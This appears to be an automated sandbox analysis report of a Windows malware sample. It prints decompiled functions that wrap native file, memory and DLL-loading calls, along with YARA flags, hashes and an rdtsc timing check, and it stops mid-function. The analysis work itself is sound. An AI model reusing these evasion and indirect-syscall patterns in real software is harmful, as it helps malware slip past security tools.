                                          			E00419D4B(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, signed int _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t23;
				void* _t33;

				_a28 = _a28 ^ 0x00000025;
				_t17 = _a4;
				_push(0x8bec8b55);
				_t5 = _t17 + 0xc40; // 0xc40
				E0041A950(_t33, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t13 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t13, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}





                                          0x00419d4b
                                          0x00419d53
                                          0x00419d59
                                          0x00419d5f
                                          0x00419d67
                                          0x00419d89
                                          0x00419d9d
                                          0x00419da1

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: %$wKA
                                          • API String ID: 823142352-2747004445
                                          • Opcode ID: 88e87748b0ded091c4d9bd157f33b6949dd7c1461f8375e7bdbb60fd74b32053
                                          • Instruction ID: 9e5d2c41450a56e0877bb1f1130457651f2e9a39c355c1b953d79af254b4180e
                                          • Opcode Fuzzy Hash: 88e87748b0ded091c4d9bd157f33b6949dd7c1461f8375e7bdbb60fd74b32053
                                          • Instruction Fuzzy Hash: D6F037B2210149AFCB08CF98D885CEB7BA9FF8C314B15864DFA1D93202C634E851CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 37%
                                          			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                          0x00419e03
                                          0x00419e0f
                                          0x00419e17
                                          0x00419e22
                                          0x00419e3d
                                          0x00419e45
                                          0x00419e49

                                          APIs
                                          • NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: FileRead
                                          • String ID: 2MA$2MA
                                          • API String ID: 2738559852-947276439
                                          • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
                                          • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                          • Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                          0x00419d5f
                                          0x00419d67
                                          0x00419d89
                                          0x00419d9d
                                          0x00419da1

                                          APIs
                                          • NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: wKA
                                          • API String ID: 823142352-3165208591
                                          • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
                                          • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                          • Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                          0x0040acdc
                                          0x0040acdf
                                          0x0040ace4
                                          0x0040ace9
                                          0x0040acf3
                                          0x0040acf8
                                          0x0040acfb
                                          0x0040acfd
                                          0x0040ad05
                                          0x0040ad0a
                                          0x0040ad0a
                                          0x0040ad11
                                          0x0040ad19
                                          0x0040ad1c
                                          0x0040ad1e
                                          0x0040ad32
                                          0x00000000
                                          0x0040ad34
                                          0x0040ad3a
                                          0x0040acee
                                          0x0040acee
                                          0x0040acee

                                          APIs
                                          • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Load
                                          • String ID:
                                          • API String ID: 2234796835-0
                                          • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
                                          • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                          • Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419E4A, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E00419E4A(void* __eflags, intOrPtr _a4, intOrPtr _a8, void* _a12) {
				long _t12;
				void* _t21;
				intOrPtr* _t26;
				void* _t28;

				asm("int1");
				if(__eflags != 0) {
					asm("in al, dx");
					_t9 = _a8;
					_t6 = _t9 + 0x10; // 0x300
					_t7 = _t9 + 0xc50; // 0x40a913
					E0041A950(_t21, _a8, _t7,  *_t6, 0, 0x2c);
					_t12 = NtClose(_a12); // executed
					return _t12;
				} else {
					_t13 = _a4;
					_t2 = _t13 + 0x10; // 0x300
					_t3 = _t13 + 0xc4c; // 0x40a90f
					_t26 = _t3;
					E0041A950(_t21, _a4, _t26,  *_t2, 0, 0x2b);
					return  *((intOrPtr*)( *_t26))(_a8, 0x8b5555b3, _t28);
				}
			}







                                          0x00419e4a
                                          0x00419e4b
                                          0x00419e82
                                          0x00419e83
                                          0x00419e86
                                          0x00419e8f
                                          0x00419e97
                                          0x00419ea5
                                          0x00419ea9
                                          0x00419e4d
                                          0x00419e53
                                          0x00419e56
                                          0x00419e5f
                                          0x00419e5f
                                          0x00419e67
                                          0x00419e79
                                          0x00419e79

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: d8d4e6451a7a47cfc49f8deb53037bcb89d79d5844530882dd66547a35c4d972
                                          • Instruction ID: 049a8d9845719cf5b0af8b6ca1a8ba4d12e27711e6df0346ea6d24de0f7eb4c8
                                          • Opcode Fuzzy Hash: d8d4e6451a7a47cfc49f8deb53037bcb89d79d5844530882dd66547a35c4d972
                                          • Instruction Fuzzy Hash: 09F062766412106FDB20DF94CC85FE77B68EF44360F15499ABA5CAB342C530EA5087D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00419F30(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A950(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                          0x00419f3f
                                          0x00419f47
                                          0x00419f69
                                          0x00419f6d

                                          APIs
                                          • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateMemoryVirtual
                                          • String ID:
                                          • API String ID: 2167126740-0
                                          • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction ID: c2721ea4e084a79d388e091216dcc94a475298a8aa449db6134383b78daf1f40
                                          • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                          • Instruction Fuzzy Hash: 7DF015B2210208AFCB14DF89CC81EEB77ADAF88754F118549BE1897241C630F810CBA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419E7A, Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 50%
                                          			E00419E7A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_pop(_t11);
				_push(cs);
				asm("enter 0x43b8, 0x55");
				asm("in al, dx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                          0x00419e7a
                                          0x00419e7b
                                          0x00419e7d
                                          0x00419e82
                                          0x00419e83
                                          0x00419e86
                                          0x00419e8f
                                          0x00419e97
                                          0x00419ea5
                                          0x00419ea9

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 61effe24256de8b9756353ed0ae9aeb21124f122d453b3b108af02c0e61038d0
                                          • Instruction ID: ec1094d0678e1fba7e685a5d62876889eb4281e6a437047dadf39a412e3f60fc
                                          • Opcode Fuzzy Hash: 61effe24256de8b9756353ed0ae9aeb21124f122d453b3b108af02c0e61038d0
                                          • Instruction Fuzzy Hash: 03E08C752002006BD710EB98CC85ED77B68EB88720F05446ABA5C5B242C530E60187D0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419E80, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00419E80(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				asm("in al, dx");
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a913
				E0041A950(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                          0x00419e82
                                          0x00419e83
                                          0x00419e86
                                          0x00419e8f
                                          0x00419e97
                                          0x00419ea5
                                          0x00419ea9

                                          APIs
                                          • NtClose.NTDLL(00414D10,?,?,00414D10,00409CC3,FFFFFFFF), ref: 00419EA5
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Yara matches
                                          Similarity
                                          • API ID: Close
                                          • String ID:
                                          • API String ID: 3535843008-0
                                          • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction ID: abd226b249efdbe90954a2e5a1f5a103ee35f8531edac2b51595525400ebd06d
                                          • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                          • Instruction Fuzzy Hash: FED01776200214ABD710EB99CC86EE77BACEF48760F15449ABA5C9B242C530FA5086E0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3039f11f7d321df329168941463e52cac6ad8f1f4dc67a0344801990908c2a50
                                          • Instruction ID: 981c0dfb19c54b27e82434c4b81679f4e3d7bb2680e737976aa808e20e4356de
                                          • Opcode Fuzzy Hash: 3039f11f7d321df329168941463e52cac6ad8f1f4dc67a0344801990908c2a50
                                          • Instruction Fuzzy Hash: 6F90027521104806D100A599544C646000597E0341F92D021A6014555EC7A988917171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9dbf5022d6f879f454b9410af712e327cd36e93345721b37044ec655124aee24
                                          • Instruction ID: 699aee53077d5545e11086e32c55fdbeb882cc63a6973fa3c8bab02defe04d66
                                          • Opcode Fuzzy Hash: 9dbf5022d6f879f454b9410af712e327cd36e93345721b37044ec655124aee24
                                          • Instruction Fuzzy Hash: 0990026531104407D140B159545C6064005E7E1341F92D021E1404554CDA5988567262
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 40766091eb32e24a23ff1edef2aa1ea3bc1b4abea7c3602aa2c63f6c88d38188
                                          • Instruction ID: 1800d94e29d57fdf8f3f1118562a0e53831ca477bc4a59a9bb82c29c8aa5e17f
                                          • Opcode Fuzzy Hash: 40766091eb32e24a23ff1edef2aa1ea3bc1b4abea7c3602aa2c63f6c88d38188
                                          • Instruction Fuzzy Hash: EC90026D22304406D180B159544C60A000597D1342FD2D425A1005558CCA5988697361
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 8bb314715a897aa16e154d3d6a8214e0c4bccdda86ee64afe0bf82e9ec6bca50
                                          • Instruction ID: 8825b32db278d2b3261e95be4373e44989a6b8a37c8f06cd66c8ab777e81e8ed
                                          • Opcode Fuzzy Hash: 8bb314715a897aa16e154d3d6a8214e0c4bccdda86ee64afe0bf82e9ec6bca50
                                          • Instruction Fuzzy Hash: 80900265611044464140B16988889064005BBE1351792C131A1988550D869D886576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d20e74833f516d715928587c3c73a1f10c042b9383e2e8f0d3a0cf53d153b7f7
                                          • Instruction ID: 8fc3436a9a86028e29ab705e7ffe5f327f1d1cb3a6483bc9420e6e8b8dca9734
                                          • Opcode Fuzzy Hash: d20e74833f516d715928587c3c73a1f10c042b9383e2e8f0d3a0cf53d153b7f7
                                          • Instruction Fuzzy Hash: 4D90027521144806D100A159485870B000597D0342F92C021A2154555D8769885175B1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 833d3b3220abc5f6a3bab4da7937b33521f662881c3b819e0a87ac9526d1a18c
                                          • Instruction ID: ddd3b0464924162c3da681fe5815d529052a9fede594fea92956a53fb4351d0c
                                          • Opcode Fuzzy Hash: 833d3b3220abc5f6a3bab4da7937b33521f662881c3b819e0a87ac9526d1a18c
                                          • Instruction Fuzzy Hash: 5E90027521104C06D180B159444864A000597D1341FD2C025A1015654DCB598A5977E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a3c5900f4d74ed1ae90e39a445ae6549ed7840b28c20304c3e8413a0af78dc78
                                          • Instruction ID: 7a7db75e7150d3ef06f47d5113ffb1e2252fbb5c723dca637c1454a981cd9240
                                          • Opcode Fuzzy Hash: a3c5900f4d74ed1ae90e39a445ae6549ed7840b28c20304c3e8413a0af78dc78
                                          • Instruction Fuzzy Hash: 7A90026522184446D200A5694C58B07000597D0343F92C125A1144554CCA5988617561
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 24081cd98dfe5170c27c43a5b1fcf5a2d5a090841b4082b22199f105a0319c3c
                                          • Instruction ID: 2180b5d781398e683e4e1a3be26b515f1c8b717c744b7d11cd1867e0b4676820
                                          • Opcode Fuzzy Hash: 24081cd98dfe5170c27c43a5b1fcf5a2d5a090841b4082b22199f105a0319c3c
                                          • Instruction Fuzzy Hash: 9F9002752110CC06D110A159844874A000597D0341F96C421A5414658D87D988917161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 53c84b5c763de0a4978577959f9f239869f12ab362aec6eab0e391e02a9a4a4f
                                          • Instruction ID: 87093ab7d05caf00f8bc9135d4f8747e5ecf7e1387a9cdc7b57972c73c66ce2b
                                          • Opcode Fuzzy Hash: 53c84b5c763de0a4978577959f9f239869f12ab362aec6eab0e391e02a9a4a4f
                                          • Instruction Fuzzy Hash: E69002B521104806D140B1594448746000597D0341F92C021A6054554E879D8DD576A5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: d56d726322a26e13d251c2c1b0f84535718ee6ee692f923af31499b5c0b439e1
                                          • Instruction ID: 79c33a24a7a7e50e2789785699b9844f46ec2a399167649e94cf94d028d341d1
                                          • Opcode Fuzzy Hash: d56d726322a26e13d251c2c1b0f84535718ee6ee692f923af31499b5c0b439e1
                                          • Instruction Fuzzy Hash: DD900269221044070105E5590748507004697D5391392C031F2005550CD76588617161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b21a309b43b4218403b91d9e1b16bf36b611dab0b832abdfb908ae4328e46e21
                                          • Instruction ID: 1a161b278840742c09b6d405914b47688da96f0f219b5520ede9b63d3f651e69
                                          • Opcode Fuzzy Hash: b21a309b43b4218403b91d9e1b16bf36b611dab0b832abdfb908ae4328e46e21
                                          • Instruction Fuzzy Hash: 9B9002A535104846D100A1594458B060005D7E1341F92C025E2054554D875DCC527166
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1f7ce716d8d9c6a8c1b8660b8d36de899ae68d130ca6a671c01ed823e74c90fa
                                          • Instruction ID: eddb717bb9152a362c210423fbeaa2054bd075368888953f81c13bebda0473b9
                                          • Opcode Fuzzy Hash: 1f7ce716d8d9c6a8c1b8660b8d36de899ae68d130ca6a671c01ed823e74c90fa
                                          • Instruction Fuzzy Hash: FB9002A5212044074105B1594458616400A97E0341B92C031E2004590DC66988917165
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: ba4e26640cb591ed920462151fb8851fe726ac6b3084125a789fe97d82f57fee
                                          • Instruction ID: 0b94933bac8e50dea8a0f46989aaa5dad98425f19915a9944b1ac3ab526442f5
                                          • Opcode Fuzzy Hash: ba4e26640cb591ed920462151fb8851fe726ac6b3084125a789fe97d82f57fee
                                          • Instruction Fuzzy Hash: 5190027521104817D111A1594548707000997D0381FD2C422A1414558D979A8952B161
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a245e716748a0693196f08f1e11d65e74836546faf140dd4f777a3f6c9afa3b3
                                          • Instruction ID: 1db83ceb5be54320803bf0e9e048d80dc3dacd561d81eac22cc57c1a84f35663
                                          • Opcode Fuzzy Hash: a245e716748a0693196f08f1e11d65e74836546faf140dd4f777a3f6c9afa3b3
                                          • Instruction Fuzzy Hash: AE900265252085565545F15944485074006A7E03817D2C022A2404950C866A9856F661
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 033E98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.342858087.0000000003380000.00000040.00000001.sdmp, Offset: 03380000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: adc672a31743466441d88b44b371864bd39a07d007a03ae059d01429161a9dc7
                                          • Instruction ID: df6af9cc97b520cc9e46071c36dc14430fa3cd0baab776456166e3a099b9e26a
                                          • Opcode Fuzzy Hash: adc672a31743466441d88b44b371864bd39a07d007a03ae059d01429161a9dc7
                                          • Instruction Fuzzy Hash: 4990026561104906D101B1594448616000A97D0381FD2C032A2014555ECB698992B171
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00409A80, Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 93%
                                          			E00409A80(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00407E80(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00408090( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041B800( &_v284, 0x104);
						E0041BE70( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00414DB0(E00414D50(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe055
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E004080C0( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E00408140(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
